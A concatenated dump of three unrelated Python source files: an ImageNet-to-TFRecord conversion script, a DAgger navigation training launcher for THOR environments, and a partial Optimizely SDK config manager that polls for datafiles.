assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'r').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
dagger_train.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import tensorflow as tf
import threading
import numpy as np
import signal
import random
import os
import time
from dagger_policy_generators import SmashNet
from dagger_training_thread import SmashNetTrainingThread
from scene_loader import THORDiscreteEnvironment as Environment
from utils.ops import log_uniform
from utils.rmsprop_applier import RMSPropApplier
from dagger_constants import ACTION_SIZE, PARALLEL_SIZE, INITIAL_ALPHA_LOW, INITIAL_ALPHA_HIGH, INITIAL_ALPHA_LOG_RATE, INITIAL_DIFFIDENCE_RATE, MAX_TIME_STEP, CHECKPOINT_DIR, LOG_FILE, RMSP_EPSILON, RMSP_ALPHA, GRAD_NORM_CLIP, USE_GPU, NUM_CPU, TASK_TYPE, TRAIN_TASK_LIST, VALID_TASK_LIST, DYNAMIC_VALIDATE, ENCOURAGE_SYMMETRY
if __name__ == '__main__':
device = "/gpu:0" if USE_GPU else "/cpu:0"
network_scope = TASK_TYPE
list_of_tasks = TRAIN_TASK_LIST
list_of_val_tasks = VALID_TASK_LIST
scene_scopes = list_of_tasks.keys()
global_t = 0
stop_requested = False
if not os.path.exists(CHECKPOINT_DIR): os.mkdir(CHECKPOINT_DIR)
initial_learning_rate = log_uniform(INITIAL_ALPHA_LOW,
INITIAL_ALPHA_HIGH,
INITIAL_ALPHA_LOG_RATE)
initial_diffidence_rate_seed = INITIAL_DIFFIDENCE_RATE # TODO: hyperparam
global_network = SmashNet(action_size = ACTION_SIZE,
device = device,
network_scope = network_scope,
scene_scopes = scene_scopes)
branches = []
branch_val = []
for scene in scene_scopes:
for task in list_of_tasks[scene]:
branches.append((scene, task)) # single scene, task pair for now
branch_val.append(False)
if DYNAMIC_VALIDATE:
for task in list_of_val_tasks[scene]:
branches.append((scene, task))
branch_val.append(True)
print("Total navigation tasks: %d" % len(branches))
NUM_TASKS = len(branches)
assert PARALLEL_SIZE >= NUM_TASKS, "Not enough threads for multitasking: at least {} threads needed.".format(NUM_TASKS)
learning_rate_input = tf.placeholder("float")
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
decay = RMSP_ALPHA,
momentum = 0.0,
epsilon = RMSP_EPSILON,
clip_norm = GRAD_NORM_CLIP,
device = device)
# instantiate each training thread
# each thread is training for one target in one scene
training_threads = [] # 1 training thread for the single target
for i in range(PARALLEL_SIZE):
scene, task = branches[i%NUM_TASKS]
if USE_GPU:
device = "/gpu:0"
else:
device = "/cpu:{:d}".format(i%NUM_CPU)
mode = "val" if branch_val[i % NUM_TASKS] else "train"
training_thread = SmashNetTrainingThread(i,
global_network,
initial_learning_rate,
learning_rate_input,
grad_applier,
MAX_TIME_STEP,
device,
initial_diffidence_rate_seed,
mode=mode,
network_scope = "thread-%d"%(i+1),
scene_scope = scene,
task_scope = task,
encourage_symmetry= ENCOURAGE_SYMMETRY)
training_threads.append(training_thread)
print("Total train threads: %d" % len(training_threads))
# prepare session
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True))
init = tf.global_variables_initializer()
sess.run(init)
# create tensorboard summaries
summary_op = dict()
summary_placeholders = dict()
for i in range(PARALLEL_SIZE):
scene, task = branches[i%NUM_TASKS]
key = scene + "-" + task
if branch_val[i % NUM_TASKS]:
key = scene + "-val-" + task
# summary for tensorboard
episode_length_input = tf.placeholder("float")
episode_pi_sim_input = tf.placeholder("float")
episode_loss_input = tf.placeholder("float")
scalar_summaries = [
tf.summary.scalar(key+"/Episode Length", episode_length_input),
tf.summary.scalar(key+"/Episode Pi Similarity", episode_pi_sim_input),
tf.summary.scalar(key+"/Episode Loss", episode_loss_input),
]
summary_op[key] = tf.summary.merge(scalar_summaries)
summary_placeholders[key] = {
"episode_length_input": episode_length_input,
"episode_pi_sim_input": episode_pi_sim_input,
"episode_loss_input": episode_loss_input,
}
summary_writer = tf.summary.FileWriter(LOG_FILE + '/' + time.strftime("%Y-%m-%d-%H%M%S"), sess.graph)
# init or load checkpoint with saver
# if you don't need to be able to resume training, use the next line instead.
# it will result in a much smaller checkpoint file.
# saver = tf.train.Saver(max_to_keep=10, var_list=global_network.get_vars())
saver = tf.train.Saver(max_to_keep=10)
checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIR)
if checkpoint and checkpoint.model_checkpoint_path:
saver.restore(sess, checkpoint.model_checkpoint_path)
print("checkpoint loaded: {}".format(checkpoint.model_checkpoint_path))
tokens = checkpoint.model_checkpoint_path.split("-")
# set global step
global_t = int(tokens[1])
print(">>> global step set: {}".format(global_t))
else:
print("Could not find old checkpoint")
def train_function(parallel_index):
global global_t
training_thread = training_threads[parallel_index]
last_global_t = 0
scene, task = branches[parallel_index % NUM_TASKS]
key = scene + "-" + task
if branch_val[parallel_index % NUM_TASKS]:
key = scene + "-val-" + task
while global_t < MAX_TIME_STEP and not stop_requested:
diff_global_t = training_thread.process(sess, global_t, summary_writer,
summary_op[key], summary_placeholders[key])
global_t += diff_global_t
# periodically save checkpoints to disk
if parallel_index == 0 and global_t - last_global_t > 1000000:
print('Save checkpoint at timestamp %d' % global_t)
saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
last_global_t = global_t
def signal_handler(signal, frame):
global stop_requested
print('You pressed Ctrl+C!')
stop_requested = True
train_threads = [threading.Thread(target=train_function, args=(i,)) for i in range(PARALLEL_SIZE)]
signal.signal(signal.SIGINT, signal_handler)
# start each training thread
for t in train_threads: t.start()
print('Press Ctrl+C to stop.')
signal.pause()
# wait for all threads to finish
for t in train_threads: t.join()
print('Now saving data. Please wait.')
saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
summary_writer.close()
|
config_manager.py
|
# Copyright 2019-2020, Optimizely
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import numbers
import requests
import threading
import time
from requests import codes as http_status_codes
from requests import exceptions as requests_exceptions
from . import exceptions as optimizely_exceptions
from . import logger as optimizely_logger
from . import project_config
from .error_handler import NoOpErrorHandler
from .notification_center import NotificationCenter
from .helpers import enums
from .helpers import validator
from .optimizely_config import OptimizelyConfigService
ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()})
class BaseConfigManager(ABC):
""" Base class for Optimizely's config manager. """
def __init__(self, logger=None, error_handler=None, notification_center=None):
""" Initialize config manager.
Args:
logger: Provides a logger instance.
error_handler: Provides a handle_error method to handle exceptions.
notification_center: Provides instance of notification_center.NotificationCenter.
"""
self.logger = optimizely_logger.adapt_logger(logger or optimizely_logger.NoOpLogger())
self.error_handler = error_handler or NoOpErrorHandler()
self.notification_center = notification_center or NotificationCenter(self.logger)
self._validate_instantiation_options()
def _validate_instantiation_options(self):
""" Helper method to validate all parameters.
Raises:
Exception if provided options are invalid.
"""
if not validator.is_logger_valid(self.logger):
raise optimizely_exceptions.InvalidInputException(enums.Errors.INVALID_INPUT.format('logger'))
if not validator.is_error_handler_valid(self.error_handler):
raise optimizely_exceptions.InvalidInputException(enums.Errors.INVALID_INPUT.format('error_handler'))
if not validator.is_notification_center_valid(self.notification_center):
raise optimizely_exceptions.InvalidInputException(enums.Errors.INVALID_INPUT.format('notification_center'))
@abc.abstractmethod
def get_config(self):
""" Get config for use by optimizely.Optimizely.
The config should be an instance of project_config.ProjectConfig."""
pass
class StaticConfigManager(BaseConfigManager):
""" Config manager that returns ProjectConfig based on provided datafile. """
def __init__(
self, datafile=None, logger=None, error_handler=None, notification_center=None, skip_json_validation=False,
):
""" Initialize config manager. Datafile has to be provided to use.
Args:
datafile: JSON string representing the Optimizely project.
logger: Provides a logger instance.
error_handler: Provides a handle_error method to handle exceptions.
notification_center: Notification center to generate config update notification.
skip_json_validation: Optional boolean param which allows skipping JSON schema
validation upon object invocation. By default
JSON schema validation will be performed.
"""
super(StaticConfigManager, self).__init__(
logger=logger, error_handler=error_handler, notification_center=notification_center,
)
self._config = None
self.optimizely_config = None
self.validate_schema = not skip_json_validation
self._set_config(datafile)
def _set_config(self, datafile):
""" Looks up and sets datafile and config based on response body.
Args:
datafile: JSON string representing the Optimizely project.
"""
if self.validate_schema:
if not validator.is_datafile_valid(datafile):
self.logger.error(enums.Errors.INVALID_INPUT.format('datafile'))
return
error_msg = None
error_to_handle = None
config = None
try:
config = project_config.ProjectConfig(datafile, self.logger, self.error_handler)
except optimizely_exceptions.UnsupportedDatafileVersionException as error:
error_msg = error.args[0]
error_to_handle = error
except:
error_msg = enums.Errors.INVALID_INPUT.format('datafile')
error_to_handle = optimizely_exceptions.InvalidInputException(error_msg)
finally:
if error_msg:
self.logger.error(error_msg)
self.error_handler.handle_error(error_to_handle)
return
previous_revision = self._config.get_revision() if self._config else None
if previous_revision == config.get_revision():
return
self._config = config
self.optimizely_config = OptimizelyConfigService(config).get_config()
self.notification_center.send_notifications(enums.NotificationTypes.OPTIMIZELY_CONFIG_UPDATE)
self.logger.debug(
'Received new datafile and updated config. '
'Old revision number: {}. New revision number: {}.'.format(previous_revision, config.get_revision())
)
def get_config(self):
""" Returns instance of ProjectConfig.
Returns:
ProjectConfig. None if not set.
"""
return self._config
class PollingConfigManager(StaticConfigManager):
""" Config manager that polls for the datafile and updated ProjectConfig based on an update interval. """
DATAFILE_URL_TEMPLATE = enums.ConfigManager.DATAFILE_URL_TEMPLATE
def __init__(
self,
sdk_key=None,
datafile=None,
update_interval=None,
blocking_timeout=None,
url=None,
url_template=None,
logger=None,
error_handler=None,
notification_center=None,
skip_json_validation=False,
):
""" Initialize config manager. One of sdk_key or url has to be set to be able to use.
Args:
sdk_key: Optional string uniquely identifying the datafile.
datafile: Optional JSON string representing the project.
update_interval: Optional floating point number representing time interval in seconds
at which to request datafile and set ProjectConfig.
blocking_timeout: Optional Time in seconds to block the get_config call until config object
has been initialized.
url: Optional string representing URL from where to fetch the datafile. If set it supersedes the sdk_key.
url_template: Optional string template which in conjunction with sdk_key
determines URL from where to fetch the datafile.
logger: Provides a logger instance.
error_handler: Provides a handle_error method to handle exceptions.
notification_center: Notification center to generate config update notification.
skip_json_validation: Optional boolean param which allows skipping JSON schema
validation upon object invocation. By default
JSON schema validation will be performed.
"""
self._config_ready_event = threading.Event()
super(PollingConfigManager, self).__init__(
datafile=datafile,
logger=logger,
error_handler=error_handler,
notification_center=notification_center,
skip_json_validation=skip_json_validation,
)
self.datafile_url = self.get_datafile_url(
sdk_key, url, url_template or self.DATAFILE_URL_TEMPLATE
)
self.set_update_interval(update_interval)
self.set_blocking_timeout(blocking_timeout)
self.last_modified = None
self._polling_thread = threading.Thread(target=self._run)
self._polling_thread.setDaemon(True)
self._polling_thread.start()
@staticmethod
def get_datafile_url(sdk_key, url, url_template):
""" Helper method to determine URL from where to fetch the datafile.
Args:
sdk_key: Key uniquely identifying the datafile.
url: String representing URL from which to fetch the datafile.
url_template: String representing template which is filled in with
SDK key to determine URL from which to fetch the datafile.
Returns:
String representing URL to fetch datafile from.
Raises:
optimizely.exceptions.InvalidInputException if:
- One of sdk_key or url is not provided.
- url_template is invalid.
"""
# Ensure that either is provided by the user.
if sdk_key is None and url is None:
raise optimizely_exceptions.InvalidInputException('Must provide at least one of sdk_key or url.')
# Return URL if one is provided or use template and SDK key to get it.
if url is None:
try:
return url_template.format(sdk_key=sdk_key)
except (AttributeError, KeyError):
raise optimizely_exceptions.InvalidInputException(
'Invalid url_template {} provided.'.format(url_template)
)
return url
def _set_config(self, datafile):
""" Looks up and sets datafile and config based on response body.
Args:
datafile: JSON string representing the Optimizely project.
"""
if datafile or self._config_ready_event.is_set():
super(PollingConfigManager, self)._set_config(datafile=datafile)
self._config_ready_event.set()
def get_config(self):
""" Returns instance of ProjectConfig. Returns immediately if project config is ready otherwise
blocks maximum for value of blocking_timeout in seconds.
Returns:
ProjectConfig. None if not set.
"""
self._config_ready_event.wait(self.blocking_timeout)
return self._config
def set_update_interval(self, update_interval):
""" Helper method to set frequency at which datafile has to be polled and ProjectConfig updated.
Args:
update_interval: Time in seconds after which to update datafile.
"""
if update_interval is None:
update_interval = enums.ConfigManager.DEFAULT_UPDATE_INTERVAL
self.logger.debug('Setting config update interval to default value {}.'.format(update_interval))
if not isinstance(update_interval, (int, float)):
raise optimizely_exceptions.InvalidInputException(
'Invalid update_interval "{}" provided.'.format(update_interval)
)
# If polling interval is less than or equal to 0 then set it to default update interval.
if update_interval <= 0:
self.logger.debug(
'update_interval value {} too small. Defaulting to {}'.format(
update_interval, enums.ConfigManager.DEFAULT_UPDATE_INTERVAL
)
)
update_interval = enums.ConfigManager.DEFAULT_UPDATE_INTERVAL
self.update_interval = update_interval
def set_blocking_timeout(self, blocking_timeout):
""" Helper method to set time in seconds to block the config call until config has been initialized.
Args:
blocking_timeout: Time in seconds to block the config call.
"""
if blocking_timeout is None:
blocking_timeout = enums.ConfigManager.DEFAULT_BLOCKING_TIMEOUT
self.logger.debug('Setting config blocking timeout to default value {}.'.format(blocking_timeout))
if not isinstance(blocking_timeout, (numbers.Integral, float)):
raise optimizely_exceptions.InvalidInputException(
'Invalid blocking timeout "{}" provided.'.format(blocking_timeout)
)
# If blocking timeout is less than 0 then set it to default blocking timeout.
if blocking_timeout < 0:
self.logger.debug(
'blocking timeout value {} too small. Defaulting to {}'.format(
blocking_timeout, enums.ConfigManager.DEFAULT_BLOCKING_TIMEOUT
)
)
blocking_timeout = enums.ConfigManager.DEFAULT_BLOCKING_TIMEOUT
self.blocking_timeout = blocking_timeout
def set_last_modified(self, response_headers):
""" Looks up and sets last modified time based on Last-Modified header in the response.
Args:
response_headers: requests.Response.headers
"""
self.last_modified = response_headers.get(enums.HTTPHeaders.LAST_MODIFIED)
def _handle_response(self, response):
""" Helper method to handle response containing datafile.
Args:
response: requests.Response
"""
try:
response.raise_for_status()
except requests_exceptions.RequestException as err:
self.logger.error('Fetching datafile from {} failed. Error: {}'.format(self.datafile_url, str(err)))
return
# Leave datafile and config unchanged if it has not been modified.
if response.status_code == http_status_codes.not_modified:
self.logger.debug('Not updating config as datafile has not updated since {}.'.format(self.last_modified))
return
self.set_last_modified(response.headers)
self._set_config(response.content)
def fetch_datafile(self):
""" Fetch datafile and set ProjectConfig. """
request_headers = {}
if self.last_modified:
request_headers[enums.HTTPHeaders.IF_MODIFIED_SINCE] = self.last_modified
try:
response = requests.get(
self.datafile_url, headers=request_headers, timeout=enums.ConfigManager.REQUEST_TIMEOUT,
)
except requests_exceptions.RequestException as err:
self.logger.error('Fetching datafile from {} failed. Error: {}'.format(self.datafile_url, str(err)))
return
self._handle_response(response)
@property
def is_running(self):
""" Check if polling thread is alive or not. """
return self._polling_thread.is_alive()
def _run(self):
""" Triggered as part of the thread which fetches the datafile and sleeps until next update interval. """
try:
while self.is_running:
self.fetch_datafile()
time.sleep(self.update_interval)
except (OSError, OverflowError) as err:
self.logger.error(
'Error in time.sleep. ' 'Provided update_interval value may be too big. Error: {}'.format(str(err))
)
raise
def start(self):
""" Start the config manager and the thread to periodically fetch datafile. """
if not self.is_running:
self._polling_thread.start()
class AuthDatafilePollingConfigManager(PollingConfigManager):
""" Config manager that polls for authenticated datafile using access token. """
DATAFILE_URL_TEMPLATE = enums.ConfigManager.AUTHENTICATED_DATAFILE_URL_TEMPLATE
def __init__(
self,
datafile_access_token,
*args,
**kwargs
):
""" Initialize config manager. One of sdk_key or url has to be set to be able to use.
Args:
datafile_access_token: String to be attached to the request header to fetch the authenticated datafile.
*args: Refer to arguments descriptions in PollingConfigManager.
**kwargs: Refer to keyword arguments descriptions in PollingConfigManager.
"""
self._set_datafile_access_token(datafile_access_token)
